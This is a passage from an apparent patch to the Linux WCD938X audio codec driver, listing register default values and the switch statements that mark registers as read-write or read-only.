+-	{WCD938X_DIGITAL_EFUSE_REG_12,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_13,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_14,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_15,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_16,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_17,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_18,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_19,                         0xFF},
+-	{WCD938X_DIGITAL_EFUSE_REG_20,                         0x0E},
+-	{WCD938X_DIGITAL_EFUSE_REG_21,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_22,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_23,                         0xF8},
+-	{WCD938X_DIGITAL_EFUSE_REG_24,                         0x16},
+-	{WCD938X_DIGITAL_EFUSE_REG_25,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_26,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_27,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_28,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_29,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_30,                         0x00},
+-	{WCD938X_DIGITAL_EFUSE_REG_31,                         0x00},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_0,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_1,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_2,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_3,                      0x88},
+-	{WCD938X_DIGITAL_TX_REQ_FB_CTL_4,                      0x88},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA0,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA1,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA2,                     0x55},
+-	{WCD938X_DIGITAL_DEM_BYPASS_DATA3,                     0x01},
+-};
+-
+-static bool wcd938x_rdwr_register(struct device *dev, unsigned int reg)
+-{
+-	switch (reg) {
+-	case WCD938X_ANA_PAGE_REGISTER:
+-	case WCD938X_ANA_BIAS:
+-	case WCD938X_ANA_RX_SUPPLIES:
+-	case WCD938X_ANA_HPH:
+-	case WCD938X_ANA_EAR:
+-	case WCD938X_ANA_EAR_COMPANDER_CTL:
+-	case WCD938X_ANA_TX_CH1:
+-	case WCD938X_ANA_TX_CH2:
+-	case WCD938X_ANA_TX_CH3:
+-	case WCD938X_ANA_TX_CH4:
+-	case WCD938X_ANA_MICB1_MICB2_DSP_EN_LOGIC:
+-	case WCD938X_ANA_MICB3_DSP_EN_LOGIC:
+-	case WCD938X_ANA_MBHC_MECH:
+-	case WCD938X_ANA_MBHC_ELECT:
+-	case WCD938X_ANA_MBHC_ZDET:
+-	case WCD938X_ANA_MBHC_BTN0:
+-	case WCD938X_ANA_MBHC_BTN1:
+-	case WCD938X_ANA_MBHC_BTN2:
+-	case WCD938X_ANA_MBHC_BTN3:
+-	case WCD938X_ANA_MBHC_BTN4:
+-	case WCD938X_ANA_MBHC_BTN5:
+-	case WCD938X_ANA_MBHC_BTN6:
+-	case WCD938X_ANA_MBHC_BTN7:
+-	case WCD938X_ANA_MICB1:
+-	case WCD938X_ANA_MICB2:
+-	case WCD938X_ANA_MICB2_RAMP:
+-	case WCD938X_ANA_MICB3:
+-	case WCD938X_ANA_MICB4:
+-	case WCD938X_BIAS_CTL:
+-	case WCD938X_BIAS_VBG_FINE_ADJ:
+-	case WCD938X_LDOL_VDDCX_ADJUST:
+-	case WCD938X_LDOL_DISABLE_LDOL:
+-	case WCD938X_MBHC_CTL_CLK:
+-	case WCD938X_MBHC_CTL_ANA:
+-	case WCD938X_MBHC_CTL_SPARE_1:
+-	case WCD938X_MBHC_CTL_SPARE_2:
+-	case WCD938X_MBHC_CTL_BCS:
+-	case WCD938X_MBHC_TEST_CTL:
+-	case WCD938X_LDOH_MODE:
+-	case WCD938X_LDOH_BIAS:
+-	case WCD938X_LDOH_STB_LOADS:
+-	case WCD938X_LDOH_SLOWRAMP:
+-	case WCD938X_MICB1_TEST_CTL_1:
+-	case WCD938X_MICB1_TEST_CTL_2:
+-	case WCD938X_MICB1_TEST_CTL_3:
+-	case WCD938X_MICB2_TEST_CTL_1:
+-	case WCD938X_MICB2_TEST_CTL_2:
+-	case WCD938X_MICB2_TEST_CTL_3:
+-	case WCD938X_MICB3_TEST_CTL_1:
+-	case WCD938X_MICB3_TEST_CTL_2:
+-	case WCD938X_MICB3_TEST_CTL_3:
+-	case WCD938X_MICB4_TEST_CTL_1:
+-	case WCD938X_MICB4_TEST_CTL_2:
+-	case WCD938X_MICB4_TEST_CTL_3:
+-	case WCD938X_TX_COM_ADC_VCM:
+-	case WCD938X_TX_COM_BIAS_ATEST:
+-	case WCD938X_TX_COM_SPARE1:
+-	case WCD938X_TX_COM_SPARE2:
+-	case WCD938X_TX_COM_TXFE_DIV_CTL:
+-	case WCD938X_TX_COM_TXFE_DIV_START:
+-	case WCD938X_TX_COM_SPARE3:
+-	case WCD938X_TX_COM_SPARE4:
+-	case WCD938X_TX_1_2_TEST_EN:
+-	case WCD938X_TX_1_2_ADC_IB:
+-	case WCD938X_TX_1_2_ATEST_REFCTL:
+-	case WCD938X_TX_1_2_TEST_CTL:
+-	case WCD938X_TX_1_2_TEST_BLK_EN1:
+-	case WCD938X_TX_1_2_TXFE1_CLKDIV:
+-	case WCD938X_TX_3_4_TEST_EN:
+-	case WCD938X_TX_3_4_ADC_IB:
+-	case WCD938X_TX_3_4_ATEST_REFCTL:
+-	case WCD938X_TX_3_4_TEST_CTL:
+-	case WCD938X_TX_3_4_TEST_BLK_EN3:
+-	case WCD938X_TX_3_4_TXFE3_CLKDIV:
+-	case WCD938X_TX_3_4_TEST_BLK_EN2:
+-	case WCD938X_TX_3_4_TXFE2_CLKDIV:
+-	case WCD938X_TX_3_4_SPARE1:
+-	case WCD938X_TX_3_4_TEST_BLK_EN4:
+-	case WCD938X_TX_3_4_TXFE4_CLKDIV:
+-	case WCD938X_TX_3_4_SPARE2:
+-	case WCD938X_CLASSH_MODE_1:
+-	case WCD938X_CLASSH_MODE_2:
+-	case WCD938X_CLASSH_MODE_3:
+-	case WCD938X_CLASSH_CTRL_VCL_1:
+-	case WCD938X_CLASSH_CTRL_VCL_2:
+-	case WCD938X_CLASSH_CTRL_CCL_1:
+-	case WCD938X_CLASSH_CTRL_CCL_2:
+-	case WCD938X_CLASSH_CTRL_CCL_3:
+-	case WCD938X_CLASSH_CTRL_CCL_4:
+-	case WCD938X_CLASSH_CTRL_CCL_5:
+-	case WCD938X_CLASSH_BUCK_TMUX_A_D:
+-	case WCD938X_CLASSH_BUCK_SW_DRV_CNTL:
+-	case WCD938X_CLASSH_SPARE:
+-	case WCD938X_FLYBACK_EN:
+-	case WCD938X_FLYBACK_VNEG_CTRL_1:
+-	case WCD938X_FLYBACK_VNEG_CTRL_2:
+-	case WCD938X_FLYBACK_VNEG_CTRL_3:
+-	case WCD938X_FLYBACK_VNEG_CTRL_4:
+-	case WCD938X_FLYBACK_VNEG_CTRL_5:
+-	case WCD938X_FLYBACK_VNEG_CTRL_6:
+-	case WCD938X_FLYBACK_VNEG_CTRL_7:
+-	case WCD938X_FLYBACK_VNEG_CTRL_8:
+-	case WCD938X_FLYBACK_VNEG_CTRL_9:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_1:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_2:
+-	case WCD938X_FLYBACK_VNEGDAC_CTRL_3:
+-	case WCD938X_FLYBACK_CTRL_1:
+-	case WCD938X_FLYBACK_TEST_CTL:
+-	case WCD938X_RX_AUX_SW_CTL:
+-	case WCD938X_RX_PA_AUX_IN_CONN:
+-	case WCD938X_RX_TIMER_DIV:
+-	case WCD938X_RX_OCP_CTL:
+-	case WCD938X_RX_OCP_COUNT:
+-	case WCD938X_RX_BIAS_EAR_DAC:
+-	case WCD938X_RX_BIAS_EAR_AMP:
+-	case WCD938X_RX_BIAS_HPH_LDO:
+-	case WCD938X_RX_BIAS_HPH_PA:
+-	case WCD938X_RX_BIAS_HPH_RDACBUFF_CNP2:
+-	case WCD938X_RX_BIAS_HPH_RDAC_LDO:
+-	case WCD938X_RX_BIAS_HPH_CNP1:
+-	case WCD938X_RX_BIAS_HPH_LOWPOWER:
+-	case WCD938X_RX_BIAS_AUX_DAC:
+-	case WCD938X_RX_BIAS_AUX_AMP:
+-	case WCD938X_RX_BIAS_VNEGDAC_BLEEDER:
+-	case WCD938X_RX_BIAS_MISC:
+-	case WCD938X_RX_BIAS_BUCK_RST:
+-	case WCD938X_RX_BIAS_BUCK_VREF_ERRAMP:
+-	case WCD938X_RX_BIAS_FLYB_ERRAMP:
+-	case WCD938X_RX_BIAS_FLYB_BUFF:
+-	case WCD938X_RX_BIAS_FLYB_MID_RST:
+-	case WCD938X_HPH_CNP_EN:
+-	case WCD938X_HPH_CNP_WG_CTL:
+-	case WCD938X_HPH_CNP_WG_TIME:
+-	case WCD938X_HPH_OCP_CTL:
+-	case WCD938X_HPH_AUTO_CHOP:
+-	case WCD938X_HPH_CHOP_CTL:
+-	case WCD938X_HPH_PA_CTL1:
+-	case WCD938X_HPH_PA_CTL2:
+-	case WCD938X_HPH_L_EN:
+-	case WCD938X_HPH_L_TEST:
+-	case WCD938X_HPH_L_ATEST:
+-	case WCD938X_HPH_R_EN:
+-	case WCD938X_HPH_R_TEST:
+-	case WCD938X_HPH_R_ATEST:
+-	case WCD938X_HPH_RDAC_CLK_CTL1:
+-	case WCD938X_HPH_RDAC_CLK_CTL2:
+-	case WCD938X_HPH_RDAC_LDO_CTL:
+-	case WCD938X_HPH_RDAC_CHOP_CLK_LP_CTL:
+-	case WCD938X_HPH_REFBUFF_UHQA_CTL:
+-	case WCD938X_HPH_REFBUFF_LP_CTL:
+-	case WCD938X_HPH_L_DAC_CTL:
+-	case WCD938X_HPH_R_DAC_CTL:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_COMP_SEL:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_EN:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_MISC1:
+-	case WCD938X_EAR_EAR_EN_REG:
+-	case WCD938X_EAR_EAR_PA_CON:
+-	case WCD938X_EAR_EAR_SP_CON:
+-	case WCD938X_EAR_EAR_DAC_CON:
+-	case WCD938X_EAR_EAR_CNP_FSM_CON:
+-	case WCD938X_EAR_TEST_CTL:
+-	case WCD938X_ANA_NEW_PAGE_REGISTER:
+-	case WCD938X_HPH_NEW_ANA_HPH2:
+-	case WCD938X_HPH_NEW_ANA_HPH3:
+-	case WCD938X_SLEEP_CTL:
+-	case WCD938X_SLEEP_WATCHDOG_CTL:
+-	case WCD938X_MBHC_NEW_ELECT_REM_CLAMP_CTL:
+-	case WCD938X_MBHC_NEW_CTL_1:
+-	case WCD938X_MBHC_NEW_CTL_2:
+-	case WCD938X_MBHC_NEW_PLUG_DETECT_CTL:
+-	case WCD938X_MBHC_NEW_ZDET_ANA_CTL:
+-	case WCD938X_MBHC_NEW_ZDET_RAMP_CTL:
+-	case WCD938X_TX_NEW_AMIC_MUX_CFG:
+-	case WCD938X_AUX_AUXPA:
+-	case WCD938X_LDORXTX_MODE:
+-	case WCD938X_LDORXTX_CONFIG:
+-	case WCD938X_DIE_CRACK_DIE_CRK_DET_EN:
+-	case WCD938X_HPH_NEW_INT_RDAC_GAIN_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L:
+-	case WCD938X_HPH_NEW_INT_RDAC_VREF_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_OVERRIDE_CTL:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R:
+-	case WCD938X_HPH_NEW_INT_PA_MISC1:
+-	case WCD938X_HPH_NEW_INT_PA_MISC2:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER1:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER2:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER3:
+-	case WCD938X_HPH_NEW_INT_HPH_TIMER4:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC2:
+-	case WCD938X_HPH_NEW_INT_PA_RDAC_MISC3:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_L_NEW:
+-	case WCD938X_HPH_NEW_INT_RDAC_HD2_CTL_R_NEW:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_LOHIFI:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_BIAS_ULP:
+-	case WCD938X_RX_NEW_INT_HPH_RDAC_LDO_LP:
+-	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_DC_CTRL:
+-	case WCD938X_MBHC_NEW_INT_MOISTURE_DET_POLLING_CTRL:
+-	case WCD938X_MBHC_NEW_INT_MECH_DET_CURRENT:
+-	case WCD938X_MBHC_NEW_INT_SPARE_2:
+-	case WCD938X_EAR_INT_NEW_EAR_CHOPPER_CON:
+-	case WCD938X_EAR_INT_NEW_CNP_VCM_CON1:
+-	case WCD938X_EAR_INT_NEW_CNP_VCM_CON2:
+-	case WCD938X_EAR_INT_NEW_EAR_DYNAMIC_BIAS:
+-	case WCD938X_AUX_INT_EN_REG:
+-	case WCD938X_AUX_INT_PA_CTRL:
+-	case WCD938X_AUX_INT_SP_CTRL:
+-	case WCD938X_AUX_INT_DAC_CTRL:
+-	case WCD938X_AUX_INT_CLK_CTRL:
+-	case WCD938X_AUX_INT_TEST_CTRL:
+-	case WCD938X_AUX_INT_MISC:
+-	case WCD938X_LDORXTX_INT_BIAS:
+-	case WCD938X_LDORXTX_INT_STB_LOADS_DTEST:
+-	case WCD938X_LDORXTX_INT_TEST0:
+-	case WCD938X_LDORXTX_INT_STARTUP_TIMER:
+-	case WCD938X_LDORXTX_INT_TEST1:
+-	case WCD938X_SLEEP_INT_WATCHDOG_CTL_1:
+-	case WCD938X_SLEEP_INT_WATCHDOG_CTL_2:
+-	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT1:
+-	case WCD938X_DIE_CRACK_INT_DIE_CRK_DET_INT2:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L2:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP1P2M:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_DIVSTOP_ULP0P6M:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG1_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2MAIN_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_L2L1L0:
+-	case WCD938X_TX_COM_NEW_INT_TXFE_ICTRL_STG2CASC_ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L2L1:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_SCBIAS_L0ULP:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L2:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L1:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_L0:
+-	case WCD938X_TX_COM_NEW_INT_TXADC_INT_ULP:
+-	case WCD938X_DIGITAL_PAGE_REGISTER:
+-	case WCD938X_DIGITAL_SWR_TX_CLK_RATE:
+-	case WCD938X_DIGITAL_CDC_RST_CTL:
+-	case WCD938X_DIGITAL_TOP_CLK_CFG:
+-	case WCD938X_DIGITAL_CDC_ANA_CLK_CTL:
+-	case WCD938X_DIGITAL_CDC_DIG_CLK_CTL:
+-	case WCD938X_DIGITAL_SWR_RST_EN:
+-	case WCD938X_DIGITAL_CDC_PATH_MODE:
+-	case WCD938X_DIGITAL_CDC_RX_RST:
+-	case WCD938X_DIGITAL_CDC_RX0_CTL:
+-	case WCD938X_DIGITAL_CDC_RX1_CTL:
+-	case WCD938X_DIGITAL_CDC_RX2_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_0_1:
+-	case WCD938X_DIGITAL_CDC_TX_ANA_MODE_2_3:
+-	case WCD938X_DIGITAL_CDC_COMP_CTL_0:
+-	case WCD938X_DIGITAL_CDC_ANA_TX_CLK_CTL:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A1_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A2_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A3_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A4_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A5_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A6_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_A7_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_0:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_2:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_C_3:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R1:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R2:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R3:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R4:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R5:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R6:
+-	case WCD938X_DIGITAL_CDC_HPH_DSM_R7:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A1_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A2_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A3_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A4_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A5_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A6_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_A7_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_0:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_2:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_C_3:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R1:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R2:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R3:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R4:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R5:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R6:
+-	case WCD938X_DIGITAL_CDC_AUX_DSM_R7:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_0:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_RX_1:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_0:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_1:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_DSD_2:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_0:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_1:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_DSD_2:
+-	case WCD938X_DIGITAL_CDC_HPH_GAIN_CTL:
+-	case WCD938X_DIGITAL_CDC_AUX_GAIN_CTL:
+-	case WCD938X_DIGITAL_CDC_EAR_PATH_CTL:
+-	case WCD938X_DIGITAL_CDC_SWR_CLH:
+-	case WCD938X_DIGITAL_SWR_CLH_BYP:
+-	case WCD938X_DIGITAL_CDC_TX0_CTL:
+-	case WCD938X_DIGITAL_CDC_TX1_CTL:
+-	case WCD938X_DIGITAL_CDC_TX2_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_RST:
+-	case WCD938X_DIGITAL_CDC_REQ_CTL:
+-	case WCD938X_DIGITAL_CDC_RST:
+-	case WCD938X_DIGITAL_CDC_AMIC_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC1_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC2_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC3_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC4_CTL:
+-	case WCD938X_DIGITAL_EFUSE_PRG_CTL:
+-	case WCD938X_DIGITAL_EFUSE_CTL:
+-	case WCD938X_DIGITAL_CDC_DMIC_RATE_1_2:
+-	case WCD938X_DIGITAL_CDC_DMIC_RATE_3_4:
+-	case WCD938X_DIGITAL_PDM_WD_CTL0:
+-	case WCD938X_DIGITAL_PDM_WD_CTL1:
+-	case WCD938X_DIGITAL_PDM_WD_CTL2:
+-	case WCD938X_DIGITAL_INTR_MODE:
+-	case WCD938X_DIGITAL_INTR_MASK_0:
+-	case WCD938X_DIGITAL_INTR_MASK_1:
+-	case WCD938X_DIGITAL_INTR_MASK_2:
+-	case WCD938X_DIGITAL_INTR_CLEAR_0:
+-	case WCD938X_DIGITAL_INTR_CLEAR_1:
+-	case WCD938X_DIGITAL_INTR_CLEAR_2:
+-	case WCD938X_DIGITAL_INTR_LEVEL_0:
+-	case WCD938X_DIGITAL_INTR_LEVEL_1:
+-	case WCD938X_DIGITAL_INTR_LEVEL_2:
+-	case WCD938X_DIGITAL_INTR_SET_0:
+-	case WCD938X_DIGITAL_INTR_SET_1:
+-	case WCD938X_DIGITAL_INTR_SET_2:
+-	case WCD938X_DIGITAL_INTR_TEST_0:
+-	case WCD938X_DIGITAL_INTR_TEST_1:
+-	case WCD938X_DIGITAL_INTR_TEST_2:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_EN:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_0_1:
+-	case WCD938X_DIGITAL_TX_MODE_DBG_2_3:
+-	case WCD938X_DIGITAL_LB_IN_SEL_CTL:
+-	case WCD938X_DIGITAL_LOOP_BACK_MODE:
+-	case WCD938X_DIGITAL_SWR_DAC_TEST:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_RX_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_RX_1:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_1:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_TX_2:
+-	case WCD938X_DIGITAL_PAD_CTL_SWR_0:
+-	case WCD938X_DIGITAL_PAD_CTL_SWR_1:
+-	case WCD938X_DIGITAL_I2C_CTL:
+-	case WCD938X_DIGITAL_CDC_TX_TANGGU_SW_MODE:
+-	case WCD938X_DIGITAL_EFUSE_TEST_CTL_0:
+-	case WCD938X_DIGITAL_EFUSE_TEST_CTL_1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_RX0:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_RX1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX0:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX1:
+-	case WCD938X_DIGITAL_PAD_CTL_PDM_TX2:
+-	case WCD938X_DIGITAL_PAD_INP_DIS_0:
+-	case WCD938X_DIGITAL_PAD_INP_DIS_1:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_0:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_1:
+-	case WCD938X_DIGITAL_DRIVE_STRENGTH_2:
+-	case WCD938X_DIGITAL_RX_DATA_EDGE_CTL:
+-	case WCD938X_DIGITAL_TX_DATA_EDGE_CTL:
+-	case WCD938X_DIGITAL_GPIO_MODE:
+-	case WCD938X_DIGITAL_PIN_CTL_OE:
+-	case WCD938X_DIGITAL_PIN_CTL_DATA_0:
+-	case WCD938X_DIGITAL_PIN_CTL_DATA_1:
+-	case WCD938X_DIGITAL_DIG_DEBUG_CTL:
+-	case WCD938X_DIGITAL_DIG_DEBUG_EN:
+-	case WCD938X_DIGITAL_ANA_CSR_DBG_ADD:
+-	case WCD938X_DIGITAL_ANA_CSR_DBG_CTL:
+-	case WCD938X_DIGITAL_SSP_DBG:
+-	case WCD938X_DIGITAL_SPARE_0:
+-	case WCD938X_DIGITAL_SPARE_1:
+-	case WCD938X_DIGITAL_SPARE_2:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_0:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_1:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_2:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_3:
+-	case WCD938X_DIGITAL_TX_REQ_FB_CTL_4:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA0:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA1:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA2:
+-	case WCD938X_DIGITAL_DEM_BYPASS_DATA3:
+-		return true;
+-	}
+-
+-	return false;
+-}
+-
+-static bool wcd938x_readonly_register(struct device *dev, unsigned int reg)
+-{
+-	switch (reg) {
+-	case WCD938X_ANA_MBHC_RESULT_1:
+-	case WCD938X_ANA_MBHC_RESULT_2:
+-	case WCD938X_ANA_MBHC_RESULT_3:
+-	case WCD938X_MBHC_MOISTURE_DET_FSM_STATUS:
+-	case WCD938X_TX_1_2_SAR2_ERR:
+-	case WCD938X_TX_1_2_SAR1_ERR:
+-	case WCD938X_TX_3_4_SAR4_ERR:
+-	case WCD938X_TX_3_4_SAR3_ERR:
+-	case WCD938X_HPH_L_STATUS:
+-	case WCD938X_HPH_R_STATUS:
+-	case WCD938X_HPH_SURGE_HPHLR_SURGE_STATUS:
+-	case WCD938X_EAR_STATUS_REG_1:
+-	case WCD938X_EAR_STATUS_REG_2:
+-	case WCD938X_MBHC_NEW_FSM_STATUS:
+-	case WCD938X_MBHC_NEW_ADC_RESULT:
+-	case WCD938X_DIE_CRACK_DIE_CRK_DET_OUT:
+-	case WCD938X_AUX_INT_STATUS_REG:
+-	case WCD938X_LDORXTX_INT_STATUS:
+-	case WCD938X_DIGITAL_CHIP_ID0:
+-	case WCD938X_DIGITAL_CHIP_ID1:
+-	case WCD938X_DIGITAL_CHIP_ID2:
+-	case WCD938X_DIGITAL_CHIP_ID3:
+-	case WCD938X_DIGITAL_INTR_STATUS_0:
+-	case WCD938X_DIGITAL_INTR_STATUS_1:
+-	case WCD938X_DIGITAL_INTR_STATUS_2:
+-	case WCD938X_DIGITAL_INTR_CLEAR_0:
+-	case WCD938X_DIGITAL_INTR_CLEAR_1:
+-	case WCD938X_DIGITAL_INTR_CLEAR_2:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_0:
+-	case WCD938X_DIGITAL_SWR_HM_TEST_1:
+-	case WCD938X_DIGITAL_EFUSE_T_DATA_0:
+-	case WCD938X_DIGITAL_EFUSE_T_DATA_1:
+-	case WCD938X_DIGITAL_PIN_STATUS_0:
+-	case WCD938X_DIGITAL_PIN_STATUS_1:
+-	case WCD938X_DIGITAL_MODE_STATUS_0:
+-	case WCD938X_DIGITAL_MODE_STATUS_1:
+-	case WCD938X_DIGITAL_EFUSE_REG_0:
+-	case WCD938X_DIGITAL_EFUSE_REG_1:
+-	case WCD938X_DIGITAL_EFUSE_REG_2:
+-	case WCD938X_DIGITAL_EFUSE_REG_3:
+-	case WCD938X_DIGITAL_EFUSE_REG_4:
+-	case WCD938X_DIGITAL_EFUSE_REG_5:
+-	case WCD938X_DIGITAL_EFUSE_REG_6:
+-	case WCD938X_DIGITAL_EFUSE_REG_7:
+-	case WCD938X_DIGITAL_EFUSE_REG_8:
+-	case WCD938X_DIGITAL_EFUSE_REG_9:
+-	case WCD938X_DIGITAL_EFUSE_REG_10:
+-	case WCD938X_DIGITAL_EFUSE_REG_11:
+-	case WCD938X_DIGITAL_EFUSE_REG_12:
+-	case WCD938X_DIGITAL_EFUSE_REG_13:
+-	case WCD938X_DIGITAL_EFUSE_REG_14:
+-	case WCD938X_DIGITAL_EFUSE_REG_15:
+-	case WCD938X_DIGITAL_EFUSE_REG_16:
+-	case WCD938X_DIGITAL_EFUSE_REG_17:
+-	case WCD938X_DIGITAL_EFUSE_REG_18:
+-	case WCD938X_DIGITAL_EFUSE_REG_19:
+-	case WCD938X_DIGITAL_EFUSE_REG_20:
